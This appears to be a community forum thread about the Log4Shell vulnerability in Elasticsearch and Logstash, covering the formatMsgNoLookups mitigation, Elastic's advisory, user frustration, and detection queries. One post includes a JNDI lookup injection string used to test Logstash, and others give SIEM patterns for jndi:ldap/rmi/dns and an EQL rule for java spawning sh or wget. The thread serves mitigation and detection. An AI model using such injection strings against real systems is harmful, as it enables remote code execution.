Zero-day exploit in Log4j2, which is part of Elasticsearch

I've added it to that and am hoping it's correct while waiting for 7.16.1

Working on adding -Dlog4j2.formatMsgNoLookups=true ....

So are we sure this works? What's the impact of adding this?
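A minimal sketch of applying that flag, assuming a tar/zip install with the JVM options file at config/jvm.options (deb/rpm installs keep it under /etc/elasticsearch); the node has to be fully restarted afterwards:

```shell
# Append the Log4j mitigation flag to jvm.options, idempotently.
# ES_JVM_OPTS is an assumption; adjust to your install layout.
ES_JVM_OPTS="config/jvm.options"
mkdir -p "$(dirname "$ES_JVM_OPTS")"   # self-contained: create the file if missing
touch "$ES_JVM_OPTS"                   # (a real install already has it)
# only append when the flag is not already present
grep -q 'log4j2.formatMsgNoLookups' "$ES_JVM_OPTS" || \
  echo '-Dlog4j2.formatMsgNoLookups=true' >> "$ES_JVM_OPTS"
```

As for the impact: the property only disables `${...}` lookup expansion inside log messages, so ordinary logging is unaffected; note the property is only honoured by log4j 2.10 and later, which is worth verifying for your bundled version.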


Is there any way to apply the mitigation to a cluster hosted in Elastic Cloud? I cannot find a way to set JVM options in the user interface.

Please report security issues as per the online instructions.

@dadoonet Some official Elastic communication and a recommendation about this would be nice. Unauthenticated RCE is not nice.

Still working on adding -Dlog4j2.formatMsgNoLookups=true ....

So are we sure this works? What's the impact of adding this?

Please see Apache Log4j2 Remote Code Execution (RCE) Vulnerability - CVE-2021-44228 - ESA-2021-31.

We will be making more announcements as details become clearer.

I've confirmed -Dlog4j2.formatMsgNoLookups=true doesn't work. What the hell? Why is there still no patch?

docker run -it logstash:7.14.2 bash
echo '${jndi:ldap://}' | logstash -e 'filter { json { source => "message" } }'

bash-4.2$ tail -1 jvm.options

Logstash {"logstash.version"=>"7.14.2", "jruby.version"=>"jruby (2.5.8) 2021-06-15 55810c552b OpenJDK 64-Bit Server VM 11.0.12+7 on 11.0.12+7 +indy +jit [linux-x86_64]"}
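A hedged way to check whether the flag actually reached a running JVM is to inspect the process command line (the helper below is hypothetical; on Linux you can feed it /proc/&lt;pid&gt;/cmdline with NUL bytes turned into spaces):

```shell
# has_mitigation: succeed if the given JVM command line carries the flag
has_mitigation() {
  case "$1" in
    *-Dlog4j2.formatMsgNoLookups=true*) return 0 ;;
    *) return 1 ;;
  esac
}

# example with a literal command line; for a live process:
#   has_mitigation "$(tr '\0' ' ' < /proc/<pid>/cmdline)"
has_mitigation "java -Dlog4j2.formatMsgNoLookups=true -cp logstash-core.jar" \
  && echo "flag present" || echo "flag missing"
```

Also note the property only exists in log4j 2.10+; on older bundled versions it is silently ignored, which might explain a "doesn't work" result.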

Folks, please be aware that this dropped on Friday and it is the weekend in most parts of the world. While we are working on a fix and uncovering its impact on our products, please respect that we don't work 24/7 :slight_smile:


Further update, please see Apache Log4j2 Remote Code Execution (RCE) Vulnerability - CVE-2021-44228 - ESA-2021-31 as it's been amended with details for each of the products and the impact that this RCE has.

TLDR - Elasticsearch is safe due to the use of the Java security manager.


@warkolm Not trying to question Elastic's findings, but I'm wondering why I see reports and screenshots of hacked Elasticsearch instances while Elastic says:


About a SIEM rule => The following query is definitely useful:

(*jndi\:ldap\:* OR *jndi\:rmi\:* OR *jndi\:ldaps* OR *jndi\:dns*)

The problem is that, due to the leading wildcards, it's a very expensive query.
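For reference, a sketch of running that Lucene expression through a query_string search; the index pattern, default_field, and endpoint are assumptions, and the leading wildcards are exactly what makes it expensive:

```shell
# build the search body (backslashes are doubled for JSON, so the Lucene
# query the server sees is: (*jndi\:ldap\:* OR *jndi\:rmi\:* OR ...))
BODY=$(cat <<'EOF'
{
  "query": {
    "query_string": {
      "query": "(*jndi\\:ldap\\:* OR *jndi\\:rmi\\:* OR *jndi\\:ldaps* OR *jndi\\:dns*)",
      "default_field": "message",
      "analyze_wildcard": true
    }
  }
}
EOF
)
printf '%s' "$BODY" | python3 -m json.tool > /dev/null && echo "body is valid JSON"
# against a live cluster (endpoint assumed):
#   curl -s -H 'Content-Type: application/json' 'localhost:9200/logs-*/_search' -d "$BODY"
```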


@willemdh That's not an Elasticsearch instance, it's the search results on the site.
The behaviour of the search has changed since yesterday, that search now triggers a 406 response.


What datasets are needed to get this query working:

sequence by host.id with maxspan=1m
 [network where event.action == "connection_attempted" and process.name : "java" and
  /* outbound connection attempt to LDAP, RMI or DNS standard ports by a JAVA process */
  destination.port in (1389, 389, 1099, 53, 5353)] by process.entity_id
 [process where event.type == "start" and
  /* Suspicious JAVA child process */
  process.parent.name : "java" and process.name : ("sh", "wget")] by process.parent.entity_id

Working? I was hoping the Auditbeat process or socket dataset would be enough, but I cannot find event.action == "connection_attempted" there. Maybe Elastic Endpoint Security data is required? Can I make this query work with only the Auditbeat socket dataset?

Maybe adding network_flow to event.action? But the Auditbeat socket dataset seems to miss
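One way to see which event.action values your Auditbeat indices actually contain (and thus whether "connection_attempted" or "network_flow" ever shows up) is a terms aggregation; the index pattern and endpoint are assumptions:

```shell
# aggregation body: bucket the distinct event.action values
BODY=$(cat <<'EOF'
{
  "size": 0,
  "aggs": {
    "actions": { "terms": { "field": "event.action", "size": 50 } }
  }
}
EOF
)
printf '%s' "$BODY" | python3 -m json.tool > /dev/null && echo "body is valid JSON"
# against a live cluster (endpoint assumed):
#   curl -s -H 'Content-Type: application/json' 'localhost:9200/auditbeat-*/_search' -d "$BODY"
```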

I would have expected a more solid response from Elastic.

It is stated that Logstash is not vulnerable because it relies on an up-to-date JDK in which LDAP external code loading is disabled. But Logstash also includes SnakeYAML and possibly other libraries that allow JNDI injection. Relying solely on an up-to-date JDK seems like a very weak and insecure response to me.

Also see PSA: Log4Shell and the current state of JNDI injection – – Random ramblings, exploits and projects.

You realize you are talking about one of the biggest, if not the biggest, security issues in Java ever, which is being actively exploited and is much bigger than something like the Equifax data breach?

I'm no Elastic customer, so not in a position to make any demands, but am now also 100% certain I will never be one.


I did some digging and it appears that Logstash plugins which depend on an older version of logstash-core-plugin-api may also be affected, even when Logstash is updated to include log4j v2.15.0.

It appears that the logstash-core gem depends on an old, vulnerable version of log4j as well - e.g. logstash-core | | your community gem host.

Logstash plugins depend on logstash-core-plugin-api which depends on logstash-core so it's a transitive dependency of the plugin (and as such, gets pulled in when bundling all the dependencies for distribution). A lot of plugins bundle all the dependencies in the gems they push to RubyGems.
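Regardless of what the gem metadata says, one hedged way to see which log4j copies are actually bundled on disk is to search the install tree for log4j-core jars (the default path is an assumption):

```shell
# list every log4j-core jar under a Logstash install, including copies
# vendored by plugin gems; LOGSTASH_HOME is an assumed default
LOGSTASH_HOME="${LOGSTASH_HOME:-/usr/share/logstash}"
find "$LOGSTASH_HOME" -name 'log4j-core-*.jar' 2>/dev/null | while read -r jar; do
  echo "found: $jar"
done
```

Any jar older than 2.15.0 in that output would confirm the concern above.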

It appears that the latest version of logstash-core (logstash-core | | your community gem host) doesn't specify log4j as a dependency anymore (how does that work now? does it just use log4j bundled with logstash core?).

Can someone please double check and confirm my thinking? Thanks.


@Kami I think this would make sense as a dedicated thread in the Logstash section; unless you want to report a security issue, in which case it's Security issues | Elastic. But I think you're more after understanding / discussing best practices going forward?
And I assume that Logstash, with its plugin architecture and dependencies, will be the most complicated product to "get right". bump log4j version to 2.15.0 (#13494) · elastic/logstash@c12d2f5 · GitHub alone might not be enough.


@MikeN123 I don't think that's the full picture: over 100 people evaluated all potentially vulnerable projects, worked on detection mechanisms, and documented it in Detecting Exploitation of CVE-2021-44228 (log4j2) with Elastic Security | Elastic Blog within 24h. It took some time to get things as correct and complete as possible in that timeframe; nobody wants a "well, actually ..." every 2h.

And we knew that, thanks to the Java Security Manager in Elasticsearch, this wasn't a remote code execution situation; why should your logging library be allowed to call random URLs, after all? The extra work we put into security features has actually paid off.


You had 100 people working on this but they couldn’t get a fixed logstash build out? That’s disturbing.

And I was just replying to one of the Elastic people saying "it's the weekend", which is just not something you should say during an urgent security issue like this.

Also note that this is not only about calling random URLs. That is the PoC, yes, but other evaluations using other gadgets are possible. Those may still be blocked by the (deprecated) SecurityManager, I don't know, but please don't think this is only about jndi:ldap.

  1. You underestimate the work required to build, test individually, and test in combination all of the artifacts on all the supported platforms that an Elastic Stack release requires. 7.16.1 and 6.8.21 are rare emergency releases that will come out shortly. This is getting all the attention it should.
  2. I'm sorry if that comment came off the wrong way; it doesn't reflect all the work that has been going into this behind the scenes.
  3. Yes, it's still an information disclosure issue for Elasticsearch, but there is a mitigation and you should upgrade once the release is available. It's been a bad weekend for everyone, but we're all in this together and need to work it out : )
  1. Is this a problem on Elastic Cloud (as I understand it, it is not) for ES6 and ES7?
  2. Is this a problem on Elastic Cloud for clusters not yet upgraded (ES5)? I could not find any info on this (yes, this week upgrading to ES6/ES7 will be a priority...)